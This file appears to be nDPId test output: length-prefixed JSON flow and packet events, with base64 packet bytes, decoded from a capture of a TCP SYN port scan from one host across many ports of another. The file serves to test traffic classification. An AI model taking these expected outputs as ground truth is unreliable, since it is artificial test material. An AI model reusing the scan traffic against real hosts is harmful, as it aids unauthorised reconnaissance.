+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAscfMAADcGn3+sEAAIQA2GNIzTOpjdU4MZAAAAAGACEADt8wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsPqgAADcG0sqsEAAIQA2GNIzTBEPdU4MZAAAAAGACEAAkSQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs3asAACwGPsesEAAIQA2GNIzTE+zdU4MZAAAAAGACBAAgoAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0oAADsGRiisEAAIQA2GNIzTAgzdU4MZAAAAAGACEAAmgAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAst5EAADAGYOGsEAAIQA2GNIzSBPjdUoMYAAAAAGACBAAvlwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsk4oAADEGg+isEAAIQA2GNIzSIsPdUoMYAAAAAGACCAANzAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBsAACwG6FesEAAIQA2GNIzSBGHdUoMYAAAAAGACBAAwLgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ0AAACYG3zKsEAAIQA2GNIzSJyjdUoMYAAAAAGACDAAFZwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsch0AADoGnFWsEAAIQA2GNIzSF3PdUoMYAAAAAGACDAAVHAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsfdEAACcGo6GsEAAIQA2GNIzSH5jdUoMYAAAAAGACEAAI9wAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs808AADYGHyOsEAAIQA2GNIzSoifdUoMYAAAAAGACDACKZwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsApcAACsGGtysEAAIQA2GNIzSFLLdUoMYAAAAAGACEAAT3QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsVuIAADgGuZCsEAAIQA2GNIzSBrXdUoMYAAAAAGACBAAt2gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsSbwAADoGxLasEAAIQA2GNIzSACvdUoMYAAAAAGACDAAsZAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs1IAAACkGSvKsEAAIQA2GNIzSBGLdUoMYAAAAAGACCAAsLQAAAgQFtA=="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_packet_id":2,"flow_last_seen":1278275060352,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275060352,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABGjNKWQmY93VKDGVAUAABTcgAAAAAAAAAA"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060355,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_packet_id":1,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060355,"pkt":"ACYLMQczACWzv5HuCABFAAAs6tAAADUGKKKsEAAIQA2GNIzSAsfdUoMYAAAAAGACCAAtyAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060355,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_packet_id":1,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060355,"pkt":"ACYLMQczACWzv5HuCABFAAAs8NEAACcGMKGsEAAIQA2GNIzSgAHdUoMYAAAAAGACEACojQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsldQAADsGd56sEAAIQA2GNIzTDLzdU4MZAAAAAGACEAAb0AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsbQQAADkGom6sEAAIQA2GNIzTBJfdU4MZAAAAAGACCAAr9QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsM\/UAADUG332sEAAIQA2GNIzTE7rdU4MZAAAAAGACCAAc0gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAs+SIAACoGJVCsEAAIQA2GNIzTBFHdU4MZAAAAAGACDAAoOwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsLpUAAC8G6t2sEAAIQA2GNIzTgAXdU4MZAAAAAGACEACohgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsXoEAADMGtvGsEAAIQA2GNIzTH0fdU4MZAAAAAGACEAAJRQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs3G0AADcGNQWsEAAIQA2GNIzTNdfdU4MZAAAAAGACEADytAAAAgQFtA=="} 
